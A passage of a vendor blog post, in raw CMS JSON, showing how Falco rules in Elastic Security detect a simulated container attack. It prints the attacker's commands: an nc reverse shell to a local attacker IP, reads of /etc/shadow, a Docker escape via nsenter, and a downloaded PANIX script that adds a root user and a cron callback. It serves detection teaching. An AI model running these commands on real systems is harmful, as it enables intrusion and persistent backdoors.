attack unfolds.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInitial access via vulnerable application in container\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe attacker exploits a remote code execution vulnerability in a Docker container running a web application, allowing for living of the land application enumeration. After finding the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003enc\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e binary, it is used to obtain a reverse shell.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs18c9647f85e2cb34"}}},{"code":{"code":"c0521e21c5af:/$ which nc ncat netcat socat python python3\n\u003e /usr/bin/nc\n\u003e /usr/bin/socat\n\nc0521e21c5af:/$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2\u003e\u00261|nc 192.168.211.131 8000 \u003e/tmp/f","_metadata":{"uid":"cs89e48899bd06df2e"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs7513c6566dcab5be"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003eFalco detection rule alerts:\u0026nbsp;\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eLaunch Suspicious Network Tool in Container\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eNon sudo setuid\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"csa06deb5674589d57"}}},{"image":{"image":{"uid":"bltb4398e523cdb82c3","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T01:36:05.759Z","created_by":"bltb6c155cd84fc0c1a","file_size":"225981","filename":"image3.png","parent_uid":null,"tags":[],"title":"image3.png","updated_at":"2024-11-13T01:36:05.759Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.653Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb4398e523cdb82c3/673402858a44184e262daaad/image3.png"},"_metadata":{"uid":"cs774e8f9a56e24a89"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf5b6bc6bf7f11105"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDiscovery of the container\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe attacker checks for privileges, permissions, and potential privilege escalation opportunities or Docker escapes:\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs4220b0cdc27b51c4"}}},{"code":{"code":"c0521e21c5af:/$ id\n\u003e uid=1000(lowprivuser) gid=1000(lowprivuser) groups=1000(lowprivuser)\n\nc0521e21c5af:/$ cat /etc/hosts\n\u003e 127.0.0.1 localhost\n\u003e 172.17.0.2 c0521e21c5af\n\nc0521e21c5af:/$ grep CapEff /proc/1/status\n\u003e CapEff: 000001ffffffffff\n\nc0521e21c5af:/$ ls -l /proc/kcore\n\u003e -r-------- 1 root root 140737471590400 Oct 29 10:09 /proc/kcore\n\nc0521e21c5af:/$ cat /etc/shadow\n\u003e cat: can't open '/etc/shadow: Permission denied\n\nc0521e21c5af:/$ cat /etc/pam.conf\n\u003e cat: can't open '/etc/pam.conf: No such file or directory\n\nc0521e21c5af:/$ cat /etc/sudoers\n\u003e cat: can't open '/etc/sudoers': Permission denied\n\nc0521e21c5af:/$ sudo -l\n\u003e User lowprivuser may run the following commands on c0521e21c5af:\n\u003e (ALL) NOPASSWD: /usr/bin/nsenter","_metadata":{"uid":"csbecb1d071e110650"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cse33726c7720e2538"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003eFalco detection rule alerts:\u0026nbsp;\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eBasic Interactive Reconnaissance\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eNon sudo setuid\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs63957b3a1268ac2b"}}},{"image":{"image":{"uid":"bltab2e71cf413c9f54","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T02:50:53.616Z","created_by":"bltb6c155cd84fc0c1a","file_size":"221062","filename":"image9.png","parent_uid":null,"tags":[],"title":"image9.png","updated_at":"2024-11-13T02:50:53.616Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.587Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltab2e71cf413c9f54/6734140dc09b5d8524c4ce43/image9.png"},"_metadata":{"uid":"cs2b93d96ddec06aec"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs166d8bf6c1204054"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDocker escape using nsenter\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLeveraging the container's privileges, the attacker escapes to the host using nsenter.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"csfdc053b0251065b9"}}},{"code":{"code":"c0521e21c5af:/$ sudo nsenter -t 1 -m -u -i -n -p -- su -\n\nroot@falco-de:~# hostname\n\u003e falco-de","_metadata":{"uid":"cs6bb2807d311fc311"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs8ef976c09a0d40f2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003eFalco detection rule alerts:\u0026nbsp;\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eChange thread namespace\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs87a03c5a76aab645"}}},{"image":{"image":{"uid":"blt5438a54067acecd1","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T02:52:02.565Z","created_by":"bltb6c155cd84fc0c1a","file_size":"277562","filename":"image16.png","parent_uid":null,"tags":[],"title":"image16.png","updated_at":"2024-11-13T02:52:02.565Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.767Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5438a54067acecd1/673414525e52ea5843bf8cb5/image16.png"},"_metadata":{"uid":"cs551c5477ea6c051e"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cscfbf9ca2fd121cd9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePersistence on the host\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe attacker establishes persistence by creating a new user and scheduling a cron job:\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs9554963125418dd5"}}},{"code":{"code":"root@falco-de:~# cd /dev/shm\n\nroot@falco-de:/dev/shm# mkdir .tmp \u0026\u0026 cd .tmp\n\nroot@falco-de:/dev/shm/.tmp# curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v1.0.0/panix.sh -o panix.sh\n\nroot@falco-de:/dev/shm/.tmp# chmod +x panix.sh\n\nroot@falco-de:/dev/shm/.tmp# ./panix.sh --passwd-user --default --username falcoctl --password falcoctl\n\u003e [+] User falcoctl added to /etc/passwd with root privileges.\n\u003e [+] /etc/passwd persistence established!\n\nroot@falco-de:/dev/shm/.tmp# ./panix.sh --cron --default --ip 192.168.211.131 --port 8080\n\u003e [+] Cron persistence established.","_metadata":{"uid":"cs58ce82896184ce77"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs1ea3d99638c5af35"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003eFalco detection rule alerts:\u0026nbsp;\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eUnexpected UDP Traffic\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eExecution from /dev/shm\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eWrite below etc\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eSchedule Cron Jobs\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eSystem procs network activity\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"csc69a56a852b6c40e"}}},{"image":{"image":{"uid":"blt17146b290e001609","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T02:53:03.831Z","created_by":"bltb6c155cd84fc0c1a","file_size":"279092","filename":"image18.png","parent_uid":null,"tags":[],"title":"image18.png","updated_at":"2024-11-13T02:53:03.831Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.702Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt17146b290e001609/6734148ffeb8f962beebe2e9/image18.png"},"_metadata":{"uid":"cs2127acc850163818"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs7c4a291ec2b631bc"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDiscovery of the host\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe attacker maps out the host environment, searching for lateral movement and sensitive information stealing opportunities.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"csdeb66499644655d6"}}},{"code":{"code":"root@falco-de:~# cat /etc/passwd\nroot@falco-de:~# cat /etc/shadow\nroot@falco-de:~# cat /etc/sudoers\nroot@falco-de:~# cat /etc/pam.conf\n\nroot@falco-de:~# uname -a\nroot@falco-de:~# crontab -l\nroot@falco-de:~# arp -a\nroot@falco-de:~# netstat -tulpn\nroot@falco-de:~# printenv","_metadata":{"uid":"cs09731f8b26064855"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs07471cce4aa63d62"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003eFalco detection rule alerts:\u0026nbsp;\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eRead sensitive file untrusted\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eBasic Interactive Reconnaissance\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eSchedule Cron Jobs\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs466b72e44da22615"}}},{"image":{"image":{"uid":"blt5cfb972247867fe0","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T02:53:55.912Z","created_by":"bltb6c155cd84fc0c1a","file_size":"184029","filename":"image2.png","parent_uid":null,"tags":[],"title":"image2.png","updated_at":"2024-11-13T02:53:55.912Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.854Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5cfb972247867fe0/673414c353e3c49706b3bf93/image2.png"},"_metadata":{"uid":"csc8f6360ad0003a96"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd44aba5fa9e69afb"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThrough these simulations, we've demonstrated how Falco can detect various malicious activities at different stages of an attack lifecycle. Each step of the attack triggers unique Falco rules, allowing for prompt detection and alerting within the Elastic Security environment. This showcases the power of Falco's fine-grained syscall monitoring in conjunction with Elastic Security's centralized management for effective threat response.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elevating cloud and endpoint security","_metadata":{"uid":"csc8c1ef07ddf69163"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe integration of Falco with Elastic Security elevates your cloud and endpoint security to new heights. This combination harnesses Falco's real-time monitoring capabilities and Elastic Security's robust analytics to provide a fortified defense mechanism against modern cyber threats. By centralizing Falco alerts within Elastic Security, you gain the advantage of streamlined management, rapid incident triage, and comprehensive threat visibility.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs a leader in SIEM solutions, we continue to champion the “bring your own endpoint detection and response (EDR) and cloud workload protection (CWP) data sources” strategy, seamlessly integrating with major providers like SentinelOne, CrowdStrike, and Microsoft Defender alongside innovative open source tools like Falco to deliver comprehensive security coverage.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis integration not only equips you to detect and react to threats more effectively but also simplifies the complexities of cloud-native security. For setup instructions and to explore further, check our detailed \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/ingest-falco.html\"\u003e\u003cspan style='font-size: 12pt;'\u003edocumentation\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. Together, we are paving the way for a more secure cloud ecosystem.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8ecad7093eaaef16"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs8ba87bf9511d8c34"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5d990a53a7d4d07c"}}}],"publish_date":"2024-11-15","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"title":"Alerting","label_l10n":"Alerting","keyword":"alerting","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltd8e03b8972ecf817","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:38:20.375Z","updated_at":"2020-06-17T03:38:20.375Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:38:20.374Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-06T00:49:19.650Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"tags_topic","title":"Automated threat protection","label_l10n":"Automated threat protection","keyword":"automated-threat-protection","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt49e356fcb7971aca","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:08:22.822Z","updated_at":"2023-11-06T20:08:22.822Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:37.794Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Cloud monitoring","label_l10n":"Cloud monitoring","keyword":"cloud-monitoring","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt4f82459203f5a666","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:35:08.968Z","updated_at":"2023-11-06T20:35:08.968Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:35.872Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt4f7e02463a803fc1","ACL":{},"created_at":"2023-11-06T20:35:19.646Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-native","label_l10n":"Cloud native","tags":[],"title":"Cloud native","updated_at":"2023-11-06T20:35:19.646Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:35:54.838Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt2d51fc8cada40465","ACL":{},"created_at":"2023-11-06T20:35:57.040Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-security","label_l10n":"Cloud security","tags":[],"title":"Cloud security","updated_at":"2023-11-06T20:35:57.040Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.295Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Cybersecurity","label_l10n":"Cybersecurity","keyword":"cybersecurity","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt276db992db94ced9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:37:07.408Z","updated_at":"2023-11-06T20:37:07.408Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:22:02.082Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":2,"locale":"en-us","uid":"blt5f2c0926801ce9c6","ACL":{},"created_at":"2023-11-06T21:28:52.513Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"kubernetes","label_l10n":"Kubernetes","tags":[],"title":"Kubernetes","updated_at":"2023-11-06T21:28:54.645Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:31:38.349Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt4eb0f5c53cfcb73a","ACL":{},"created_at":"2023-11-06T20:43:57.712Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"open-source-standards","label_l10n":"Open source/standards","tags":[],"title":"Open source/standards","updated_at":"2023-11-06T20:43:57.712Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:38:21.485Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt47414afcde70b058","ACL":{},"created_at":"2023-11-06T20:43:45.793Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"open-security","label_l10n":"Open security","tags":[],"title":"Open security","updated_at":"2023-11-06T20:43:45.793Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:38:27.618Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltd11e6308b4dbe770","ACL":{},"created_at":"2023-11-06T21:32:01.057Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-research","label_l10n":"Security research","tags":[],"title":"Security research","updated_at":"2023-11-06T21:32:01.057Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.638Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt43ad419de732b584","ACL":{},"created_at":"2023-11-06T21:31:46.367Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-analytics","label_l10n":"Security analytics","tags":[],"title":"Security analytics","updated_at":"2023-11-06T21:31:46.367Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.534Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt8adcbb1adf4f30dc","ACL":{},"created_at":"2020-06-17T03:37:36.199Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"stack-security","label_l10n":"Stack security","tags":[],"title":"Stack security","updated_at":"2020-06-17T03:37:36.199Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-10-07T20:06:58.974Z","user":"blt36e890d06c5ec32c"},"_content_type_uid":"tags_topic"},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltac352930d0bd6c7f","ACL":{},"created_at":"2023-11-06T21:36:27.692Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"xdr","label_l10n":"XDR","tags":[],"title":"XDR","updated_at":"2023-11-06T21:36:27.692Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.167Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt9e37344acd64cf5a","ACL":{},"created_at":"2023-11-06T20:38:34.272Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ebpf","label_l10n":"eBPF","tags":[],"title":"eBPF","updated_at":"2023-11-06T20:38:34.272Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.250Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blte007e1c9cef6ad6b","ACL":{},"created_at":"2020-06-17T03:32:48.898Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"endpoint-security","label_l10n":"Endpoint security","tags":[],"title":"Endpoint security","updated_at":"2020-07-06T22:20:15.552Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-03-23T17:30:22.357Z","user":"blt36e890d06c5ec32c"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt6f00e40aaa5c6f0e","ACL":{},"created_at":"2020-06-17T03:32:57.128Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"siem","label_l10n":"SIEM","tags":[],"title":"SIEM","updated_at":"2020-07-06T22:20:05.385Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.450Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt7c9678952b51e9f2","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T00:29:38.649Z","created_by":"bltb6c155cd84fc0c1a","file_size":"98376","filename":"man-on-cliff_(1).png","parent_uid":null,"tags":[],"title":"man-on-cliff (1).png","updated_at":"2024-11-13T00:29:38.649Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.599Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7c9678952b51e9f2/6733f2f24c9c31207f0194a8/man-on-cliff_(1).png"},"title":"Securing the edge: Harnessing Falco's power with Elastic Security for cloud workload protection","title_l10n":"Securing the edge: Harnessing Falco's power with Elastic Security for cloud workload protection","updated_at":"2024-11-13T21:44:54.804Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/falco-elastic-security-cloud-workload-protection","publish_details":{"time":"2024-11-15T15:00:03.344Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltef48e766f5b60534","_version":7,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic Security now supports custom knowledge sources for the Elastic AI Assistant, enabling tailored responses from private data like incident response playbooks, hunting queries, historical incident data, and threat intelligence reports.","author":["blt47281ee31f9b7aa9"],"category":["bltb79594af7c5b4199"],"created_at":"2024-11-12T16:42:56.575Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs77015aa4331b0b2e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAs we’ve seen over the past year and a half, generative AI has been an extremely beneficial addition to security analyst workflows. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/ai\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLarge language models (LLMs)\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e are a tremendous knowledge resource on all things cybersecurity and can be asked virtually any question relating to a security analyst’s workflow.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWe’ve seen incredible results from \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/transforming-cybersecurity-elastic-search-ai-proficio\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ecustomers using the Elastic AI Assistant\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e within their security operations workflows, enabling efficient operations and increased productivity.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHowever, LLMs fall short when it comes to answering questions about public content that falls outside their training cutoff date or questions related to private data 